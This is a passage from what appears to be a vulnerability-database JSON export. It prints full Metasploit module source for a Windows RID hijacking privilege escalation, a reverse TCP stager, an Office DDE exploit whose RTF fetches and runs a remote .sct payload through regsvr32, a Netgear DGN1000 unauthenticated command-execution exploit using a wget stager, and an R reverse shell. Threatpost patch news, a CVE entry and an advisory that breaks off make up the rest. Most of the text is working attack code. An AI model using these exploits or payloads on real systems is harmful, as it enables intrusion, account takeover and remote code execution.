(pointer + 16)\n #Read the description(up to 512 bytes)\n interface['description'] = @host_process.memory.read(pointer,512)\n pointer = (pointer + 512)\n #Read the state of the interface (4 bytes)\n state = @host_process.memory.read(pointer,4)\n pointer = (pointer + 4)\n #Turn the state into human readable form\n state = state.unpack(\"V\")[0]\n case state\n when 0\n interface['state'] = \"The interface is not ready to operate.\"\n when 1\n interface['state'] = \"The interface is connected to a network.\"\n when 2\n interface['state'] = \"The interface is the first node in an ad hoc network. No peer has connected.\"\n when 3\n interface['state'] = \"The interface is disconnecting from the current network.\"\n when 4\n interface['state'] = \"The interface is not connected to any network.\"\n when 5\n interface['state'] = \"The interface is attempting to associate with a network.\"\n when 6\n interface['state'] = \"Auto configuration is discovering the settings for the network.\"\n when 7\n interface['state'] = \"The interface is in the process of authenticating.\"\n else\n interface['state'] = \"Unknown State\"\n end\n interfaces << interface\n end\n return interfaces\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/wlan/wlan_probe_request.rb"}, {"lastseen": "2019-12-02T20:07:29", "bulletinFamily": "exploit", "description": "This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the destination machine. Taking advantage of some Windows Local Users Management integrity issues, this module will allow to authenticate with one known account credentials (like GUEST account), and access with the privileges of another existing account (like ADMINISTRATOR account), even if the spoofed account is disabled.\n", "modified": "2018-04-03T02:57:41", "published": "2018-02-20T21:29:23", "id": "MSF:POST/WINDOWS/MANAGE/RID_HIJACK", "href": "", "type": "metasploit", "title": "Windows Manage RID Hijacking", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Post::Windows::Priv\n\n def initialize\n super(\n 'Name' => 'Windows Manage RID Hijacking',\n 'Description' => %q{\n This module will create an entry on the target by modifying some properties\n of an existing account. It will change the account attributes by setting a\n Relative Identifier (RID), which should be owned by one existing\n account on the destination machine.\n\n Taking advantage of some Windows Local Users Management integrity issues,\n this module will allow to authenticate with one known account\n credentials (like GUEST account), and access with the privileges of another\n existing account (like ADMINISTRATOR account), even if the spoofed account is\n disabled.\n },\n 'License' => MSF_LICENSE,\n 'Author' => 'Sebastian Castro <sebastian.castro[at]cslcolombia.com>',\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'References'\t=> [\n ['URL', 'http://csl.com.co/rid-hijacking/']\n ])\n\n register_options(\n [\n OptBool.new('GETSYSTEM', [true, 'Attempt to get SYSTEM privilege on the target host.', false]),\n OptBool.new('GUEST_ACCOUNT', [true, 'Assign the defined RID to the Guest Account.', false]),\n OptString.new('USERNAME', [false, 'User to set the defined RID.']),\n OptString.new('PASSWORD', [false, 'Password to set to the defined user account.']),\n OptInt.new('RID', [true, 'RID to set to the specified account.', 500])\n ]\n )\n end\n\n def getsystem\n results = session.priv.getsystem\n if results[0]\n return true\n else\n return false\n end\n end\n\n def get_name_from_rid(reg_key, rid, names_key)\n names_key.each do |name|\n skey = registry_getvalinfo(reg_key + \"\\\\Names\\\\#{name}\", \"\")\n rid_user = skey['Type']\n return name if rid_user == rid\n end\n return nil\n end\n\n def get_user_rid(reg_key, username, names_key)\n names_key.each do |name|\n next unless name.casecmp(username).zero?\n print_good(\"Found #{name} account!\")\n skey = registry_getvalinfo(reg_key + \"\\\\Names\\\\#{name}\", \"\")\n rid = skey['Type']\n if !skey\n print_error(\"Could not open user's key\")\n return -1\n end\n return rid\n end\n return -1\n end\n\n def check_active(fbin)\n if fbin[0x38].unpack(\"H*\")[0].to_i != 10\n return true\n else\n return false\n end\n end\n\n def swap_rid(fbin, rid)\n # This function will set hex format to a given RID integer\n hex = [format(\"%04x\", rid).scan(/.{2}/).reverse.join].pack(\"H*\")\n # Overwrite new RID at offset 0x30\n fbin[0x30, 2] = hex\n return fbin\n end\n\n def run\n # Registry key to manipulate\n reg_key = 'HKLM\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users'\n\n # Checks privileges of the session, and tries to get SYSTEM privileges if needed.\n print_status(\"Checking for SYSTEM privileges on session\")\n if !is_system?\n if datastore['GETSYSTEM']\n print_status(\"Trying to get SYSTEM privileges\")\n if getsystem\n print_good(\"Got SYSTEM privileges\")\n else\n print_error(\"Could not obtain SYSTEM privileges\")\n return\n end\n else\n print_error(\"Session is not running with SYSTEM privileges. Try setting GETSYSTEM \")\n return\n end\n else\n print_good(\"Session is already running with SYSTEM privileges\")\n end\n\n # Checks the Windows Version.\n wver = sysinfo[\"OS\"]\n print_status(\"Target OS: #{wver}\")\n\n # Load the usernames from SAM Registry key\n names_key = registry_enumkeys(reg_key + '\\\\Names')\n unless names_key\n print_error(\"Could not access to SAM registry keys\")\n return\n end\n\n # If username is set, looks for it in SAM registry key\n user_rid = -1\n username = datastore['USERNAME']\n if datastore['GUEST_ACCOUNT']\n user_rid = 0x1f5\n print_status(\"Target account: Guest Account\")\n username = get_name_from_rid(reg_key, user_rid, names_key)\n else\n if datastore['USERNAME'].to_s.empty?\n print_error(\"You must set an username or enable GUEST_ACCOUNT option\")\n return\n end\n print_status('Checking users...')\n user_rid = get_user_rid(reg_key, datastore['USERNAME'], names_key)\n end\n\n # Result of the RID harvesting\n if user_rid == -1\n print_error(\"Could not find the specified username\")\n return\n else\n print_status(\"Target account username: #{username}\")\n print_status(\"Target account RID: #{user_rid}\")\n end\n\n # Search the Registry associated to the user's RID and overwrites it\n users_key = registry_enumkeys(reg_key)\n users_key.each do |r|\n next if r.to_i(16) != user_rid\n f = registry_getvaldata(reg_key + \"\\\\#{r}\", \"F\")\n if check_active(f)\n print_status(\"Account is disabled, activating...\")\n f[0x38] = [\"10\"].pack(\"H\")\n print_good(\"Target account enabled\")\n else\n print_good(\"Target account is already enabled\")\n end\n\n print_status(\"Overwriting RID\")\n # Overwrite RID to specified RID\n f = swap_rid(f, datastore['RID'])\n\n open_key = registry_setvaldata(reg_key + \"\\\\#{r}\", \"F\", f, \"REG_BINARY\")\n unless open_key\n print_error(\"Can't write to registry... Something's wrong!\")\n return -1\n end\n print_good(\"The RID #{datastore['RID']} is set to the account #{username} with original RID #{user_rid}\")\n end\n # If set, changes the specified username's password\n if datastore['PASSWORD']\n print_status(\"Setting #{username} password to #{datastore['PASSWORD']}\")\n cmd = cmd_exec('cmd.exe', \"/c net user #{username} #{datastore['PASSWORD']}\")\n vprint_status(cmd.to_s)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/manage/rid_hijack.rb"}, {"lastseen": "2019-11-13T17:25:47", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker\n", "modified": "2018-03-04T23:43:15", "published": "2018-02-04T07:01:27", "id": "MSF:PAYLOAD/WINDOWS/X64/SHELL/REVERSE_TCP_RC4", "href": "", "type": "metasploit", "title": "Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/x64/reverse_tcp_rc4'\n\n\nmodule MetasploitModule\n\n CachedSize = 585\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4_x64\n\n def self.handler_type_alias\n \"reverse_tcp_rc4\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'max3raza', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockrdi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb"}, {"lastseen": "2019-11-28T14:42:32", "bulletinFamily": "exploit", "description": "This module generates an DDE command to place within a word document, that when executed, will retrieve a HTA payload via HTTP from an web server.\n", "modified": "2017-12-07T19:44:36", "published": "2017-12-07T03:40:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_DDE_DELIVERY", "href": "", "type": "metasploit", "title": "Microsoft Office DDE Payload Delivery", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office DDE Payload Delivery',\n 'Description' => %q{\n This module generates an DDE command to place within\n a word document, that when executed, will retrieve a HTA payload\n via HTTP from an web server.\n },\n 'Author' => 'mumbai',\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => 'Oct 9 2017',\n 'References' => [\n ['URL', 'https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563'],\n ['URL', 'https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/']\n ],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Targets' =>\n [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'DefaultOptions' => {\n 'DisablePayloadHandler' => false,\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp',\n 'EXITFUNC' => 'thread'\n }\n ))\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as\", \"msf.rtf\"]),\n OptPath.new(\"INJECT_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n def retrieve_header(filename)\n if (not datastore['INJECT_PATH'].nil?)\n path = \"#{datastore['INJECT_PATH']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n ::File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9' + \"\\n\"\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9' + \"\\n\"\n end\n return header\n end\n\n def create_rtf\n #\n header = retrieve_header(datastore['FILENAME'])\n field_class = '{\\field{\\*\\fldinst {\\rtlch\\fcs1 \\af31507 \\ltrch\\fcs0 \\insrsid3807165 '\n field_class << \"DDEAUTO C:\\\\\\\\\\\\\\\\Programs\\\\\\\\\\\\\\\\Microsoft\\\\\\\\\\\\\\\\Office\\\\\\\\\\\\\\\\MSword.exe\\\\\\\\\\\\\\\\..\\\\\\\\\\\\\\\\..\\\\\\\\\\\\\\\\..\\\\\\\\\\\\\\\\..\\\\\\\\\\\\\\\\Windows\\\\\\\\\\\\\\\\System32\\\\\\\\\\\\\\\\cmd.exe \\\"/c regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\\\" }}\"\n field_class << '{\\fldrslt }}\\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sftnbj {\\rtlch\\fcs1 \\af31507 \\ltrch\\fcs0' + \"\\n\"\n field_class << '\\insrsid5790315' + \"\\n\"\n field_class << '\\par }'\n footer = '}}' # footer\n rtf = header + field_class + footer\n rtf\n end\n\n def primer\n file_create(create_rtf)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_dde_delivery.rb"}, {"lastseen": "2019-10-22T03:49:35", "bulletinFamily": "exploit", "description": "This module exploits an unauthenticated OS command execution vulneralbility in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and DGN2000v1 models.\n", "modified": "2017-11-11T00:15:22", "published": "2017-10-19T01:37:26", "id": "MSF:EXPLOIT/LINUX/HTTP/NETGEAR_DGN1000_SETUP_UNAUTH_EXEC", "href": "", "type": "metasploit", "title": "Netgear DGN1000 Setup.cgi Unauthenticated RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE',\n 'Description' => %q{\n This module exploits an unauthenticated OS command execution vulneralbility\n in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and\n DGN2000v1 models.\n },\n 'Author' => [\n 'Mumbai', # https://github.com/realoriginal (module)\n 'Robort Palerie <roberto@greyhats.it>' # vuln discovery\n ],\n 'References' => [\n ['EDB', '25978'],\n ],\n 'DisclosureDate' => 'Jun 5 2013',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSBE,\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'\n },\n 'Privileged' => true,\n 'Payload' => {\n 'DisableNops' => true,\n },\n 'Targets' => [[ 'Automatic', {} ]],\n ))\n end\n\n def check\n begin\n res = send_request_cgi({\n 'uri' => '/setup.cgi',\n 'method' => 'GET'\n })\n if res && res.headers['WWW-Authenticate']\n auth = res.headers['WWW-Authenticate']\n if auth =~ /DGN1000/\n return Exploit::CheckCode::Detected\n end\n end\n rescue ::Rex::ConnectionError\n return Exploit::CheckCode::Unknown\n end\n Exploit::CheckCode::Unknown\n end\n\n def exploit\n print_status(\"#{peer} - Connecting to target...\")\n\n unless check == Exploit::CheckCode::Detected\n fail_with(Failure::Unknown, \"#{peer} - Failed to access vulnerable URL\")\n end\n\n print_status(\"#{peer} - Exploiting target ....\")\n execute_cmdstager(\n :flavor => :wget,\n :linemax => 200,\n :concat_operator => \" && \"\n )\n end\n\n def execute_command(cmd, opts)\n begin\n res = send_request_cgi({\n 'uri' => '/setup.cgi',\n 'method' => 'GET',\n 'vars_get' => {\n 'next_file' => 'netgear.cfg',\n 'todo' => 'syscmd',\n 'cmd' => cmd.to_s,\n 'curpath' => '/',\n 'currentsetting.htm' => '1'\n }\n })\n return res\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb"}, {"lastseen": "2019-12-02T14:15:20", "bulletinFamily": "exploit", "description": "Connect back and create a command shell via R\n", "modified": "2017-08-28T10:30:30", "published": "2017-08-21T01:25:57", "id": "MSF:PAYLOAD/CMD/UNIX/REVERSE_R", "href": "", "type": "metasploit", "title": "Unix Command Shell, Reverse TCP (via R)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/r'\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 157\n\n include Msf::Payload::Single\n include Msf::Payload::R\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Unix Command Shell, Reverse TCP (via R)',\n 'Description' => 'Connect back and create a command shell via R',\n 'Author' => [ 'RageLtMan' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'R',\n 'Payload' => { 'Offsets' => {}, 'Payload' => '' }\n ))\n end\n\n def generate\n return prepends(r_string)\n end\n\n def prepends(r_string)\n return \"R -e \\\"#{r_string}\\\"\"\n end\n\n def r_string\n lhost = datastore['LHOST']\n lhost = \"[#{lhost}]\" if Rex::Socket.is_ipv6?(lhost)\n return \"s<-socketConnection(host='#{lhost}',port=#{datastore['LPORT']},\" +\n \"blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines\" +\n \"(pipe(readLines(s, 1))),s)}\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/cmd/unix/reverse_r.rb"}], "threatpost": [{"lastseen": "2019-11-04T07:14:46", "bulletinFamily": "info", "description": "Adobe released patches for two bugs rated \u201cimportant\u201d in its Adobe Digital Edition and Adobe Connect products.\n\nThe two [important](<https://helpx.adobe.com/security/products/Digital-Editions/apsb19-04.html>) vulnerabilities, patched Tuesday, include an information disclosure bug in Adobe\u2019s ebook reader software program, Digital Edition; as well as a session token exposure bug in its presentation and web conferencing software, Adobe Connect.\n\nThe \u201cimportant\u201d out of bounds read bug, [CVE-2018-12817](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-12817>), is an information disclosure vulnerability impacting Adobe Digital Edition versions 4.5.9 and earlier, for Windows, macOS, iOS and Android. Jaanus K\u00e4\u00e4p of Clarified Security was credited with discovering the issue.\n\n\u201cAdobe has released a security update for Adobe Digital Editions,\u201d according to Adobe\u2019s release. \u201cThis update resolves an important vulnerability. Successful exploitation could lead to information disclosure in the context of the current user.\u201d\n\nUsers are urged to update Adobe Digital Editions to 4.5.10 in a priority 3 update \u2013 meaning that it \u201cresolves vulnerabilities in a product that has historically not been a target for attackers\u201d according to Adobe.\n\nThe other bug, an \u201cimportant\u201d session token exposure glitch in [Adobe Connect](<https://helpx.adobe.com/security/products/connect/apsb19-05.html>), (CVE-2018-19718) could enable exposure of the privileges granted to a session. Impacted are Adobe Connect versions 9.8.1 and earlier on all platforms. Users are urged to update to Adobe Connect 10.1 in a priority 3 update.\n\nAdobe said that it is not aware of current exploits for either of these vulnerabilities.\n\nThe update comes on the heels of a slew of unscheduled fixes for Adobe Acrobat and Reader for Windows and MacOS [last week](<https://threatpost.com/adobe-critical-acrobat-reader-flaws/140547/>). The [updates](<https://blogs.adobe.com/psirt/?p=1682>) fixed two critical vulnerabilities, CVE-2018-16011 and CVE-2018-19725. Successful exploitation of the flaws could lead to [arbitrary code execution](<https://helpx.adobe.com/security/products/acrobat/apsb19-02.html>) in the context of the current user.\n\nThe patch also comes on the heels of a busy December for Adobe. The company patched 87 vulnerabilities for Acrobat and Reader in its [December Patch Tuesday](<https://threatpost.com/adobe-december-2018-patch-tuesday/139792/>) update, including a slew of critical flaws that would allow arbitrary code-execution.\n\n\u201cClosing out 2018, Adobe Flash had two Zero Day vulnerabilities in late November (CVE-2018-15981) and early December (CVE-2018-15982),\u201d Chris Goettl, director of product management for Security at Ivanti, told Threatpost. \u201cEnsure that Adobe Acrobat, Reader, and Flash Player are part of your monthly maintenance for January.\u201d\n", "modified": "2019-01-08T14:48:36", "published": "2019-01-08T14:48:36", "id": "THREATPOST:8262C6E0DB15A17DC749BCD1D3C68AED", "href": "https://threatpost.com/adobe-patches-important-bugs-in-connect-and-digital-edition/140635/", "type": "threatpost", "title": "Adobe Patches Important Bugs in Connect and Digital Edition", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:15:29", "bulletinFamily": "info", "description": "Adobe on Thursday released unscheduled security updates for Adobe Acrobat and Reader for Windows and MacOS.\n\nThe [updates](<https://blogs.adobe.com/psirt/?p=1682>) fix two critical vulnerabilities, CVE-2018-16011 and CVE-2018-19725. Successful exploitation of the flaws could lead to [arbitrary code execution](<https://helpx.adobe.com/security/products/acrobat/apsb19-02.html>) in the context of the current user.\n\nThe first vulnerability, CVE-2018-16011, reported by Sebastian Apelt in conjunction with the Zero Day Initiative, is a critical use-after-free flaw that could enable arbitrary code-execution. The vulnerability had been addressed in a separate issue included in a [previous Adobe advisory](<https://www.qualys.com/research/security-alerts/2018-12-11/adobe/>).\n\nThe second flaw, CVE-2018-19725, reported by Abdul Aziz Hariri, is a critical security bypass vulnerability that allows privilege escalation. That flaw \u201cis a security feature bypass that would allow a privilege escalation, giving an attacker broader access to the system affected,\u201d Chris Goettl, director of product management, security, at Ivanti, told Threatpost.\n\nImpacted are Acrobat DC and Acrobat Reader DC versions 2019.010.20064 and earlier; Acrobat 2017 and Acrobat Reader 2017 versions 2017.011.30110 and earlier; and Acrobat DC and Acrobat Reader DC versions 2015.006.30461 and earlier.\n\nThe patches are a priority 2, meaning that there are no known exploits for the vulnerabilities; but they exist in products that have historically been \u201cat elevated risk,\u201d according to Adobe.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/01/03163151/adobe.png>)\n\nAdobe recommends users update to Adobe Acrobat and Reader versions 2019.010.20069, Acrobat 2017 and Acrobat Reader 2017.011.30113 and Acrobat DC and Acrobat Reader DC 2015.006.30464.\n\nThe patch comes on the heels of a busy December for Adobe. The company patched 87 vulnerabilities for Acrobat and Reader in its [December Patch Tuesday](<https://threatpost.com/adobe-december-2018-patch-tuesday/139792/>) update, including a slew of critical flaws that would allow arbitrary code-execution. Beyond that, Adobe Flash had two Zero Day vulnerabilities in late November (CVE-2018-15981) and early [December](<https://threatpost.com/zero-day-microsoft-december-patch-tuesday/139826/>) (CVE-2018-15982).\n\n\u201cBetween this update and the December _[APSB18-41](<https://helpx.adobe.com/security/products/acrobat/apsb18-41.html>)_, which resolved 87 vulnerabilities, it is recommended to ensure that any Adobe Acrobat and Reader instances are updated in the next two to four weeks,\u201d Goettl told us. \u201cYou can also expect an Adobe Flash Player update next week on Patch Tuesday.\u201d\n\nBoth flaws were reported through Trend Micro\u2019s Zero Day Initiative.\n", "modified": "2019-01-04T12:30:54", "published": "2019-01-04T12:30:54", "id": "THREATPOST:17FD05502596AA5CBE03A5D56D3CA715", "href": "https://threatpost.com/adobe-critical-acrobat-reader-flaws/140547/", "type": "threatpost", "title": "Adobe Fixes Two Critical Acrobat and Reader Flaws", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-10-04T12:26:09", "bulletinFamily": "NVD", "description": "Artifex Ghostscript 9.25 and earlier allows attackers to bypass a sandbox protection mechanism via vectors involving errorhandler setup. NOTE: this issue exists because of an incomplete fix for CVE-2018-17183.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-17961", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17961", "published": "2018-10-15T16:29:00", "title": "CVE-2018-17961", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-02T09:36:26", "bulletinFamily": "exploit", "description": "Trend Micro IMSVA Management Portal version 9.1.0.1600 suffers from an authentication bypass vulnerability.", "modified": "2018-02-10T00:00:00", "published": "2018-02-10T00:00:00", "href": "https://0day.today/exploit/description/29759", "id": "1337DAY-ID-29759", "title": "Trend Micro IMSVA Management Portal 9.1.0.1600 Authentication Bypass Exploit", "type": "zdt", "sourceData": "Title: Trend Micro IMSVA Management Portal Authentication Bypass\r\nAdvisory ID: KL-001-2018-006\r\nPublication Date: 2018.02.08\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-006.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Trend Micro\r\n Affected Product: InterScan Mail Security Virtual Apppliance\r\n Affected Version: 9.1.0.1600\r\n Platform: Embedded Linux\r\n CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-219: Sensitive Data Under Web Root\r\n Impact: Authentication Bypass\r\n Attack vector: HTTPS\r\n\r\n2. Vulnerability Description\r\n\r\n Any unauthenticated user can bypass the authentication process.\r\n\r\n3. Technical Description\r\n\r\n The web application is plugin-based and allows widgets to\r\n be loaded into the application. A plugin which is loaded by\r\n default stores a log file of events in a directory which can be\r\n accessed by unauthenticated users. Files within this directory\r\n (such as /widget/repository/log/diagnostic.log) which contain\r\n cookie values can then be read, parsed, and session information\r\n extracted. A functional exploit is shown below.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n Trend Micro has released a Critical Patch update to the\r\n affected versions for this vulnerability. The advisory and\r\n links to the patch(es) are available from the following URL:\r\n\r\n https://success.trendmicro.com/solution/1119277\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin (@thatguylevel)\r\n of KoreLogic, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2017.08.11 - KoreLogic submits vulnerability details to Trend Micro.\r\n 2017.08.11 - Trend Micro confirms receipt.\r\n 2017.09.15 - KoreLogic asks for an update on the triage of the\r\n reported issue.\r\n 2017.09.15 - Trend Micro informs KoreLogic that the issue is in\r\n remediation but there is no expected release date yet.\r\n 2017.09.25 - 30 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.10.06 - Trend Micro informs KoreLogic that the issue will not\r\n be addressed before the 45 business-day deadline. They\r\n ask for additional time for the details to remain\r\n embargoed in order to complete QA on the proposed fix.\r\n 2017.10.06 - KoreLogic agrees to extend the disclosure timeline.\r\n 2017.10.17 - 45 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.11.02 - Trend Micro notifies KoreLogic that the Critical Patch\r\n for IMSVA 9.1 (Critical Patch 1682) has gone live,\r\n but they are still working on the patch for IMSVA 9.0.\r\n 2017.11.07 - 60 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.12.21 - 90 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.12.28 - Trend Micro notifies KoreLogic that the IMSVA 9.0\r\n Critical Patch is being localized for foreign language\r\n customers. Expected release date is late January 2018.\r\n 2018.01.18 - Trend Micro notifies KoreLogic that the expected release\r\n date for the IMSVA 9.0 Critical Patch and the advisory\r\n is to be January 31, 2018.\r\n 2018.01.23 - 110 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2018.01.31 - Trend Micro releases the advisory associated with this\r\n vulnerability and the related Critical 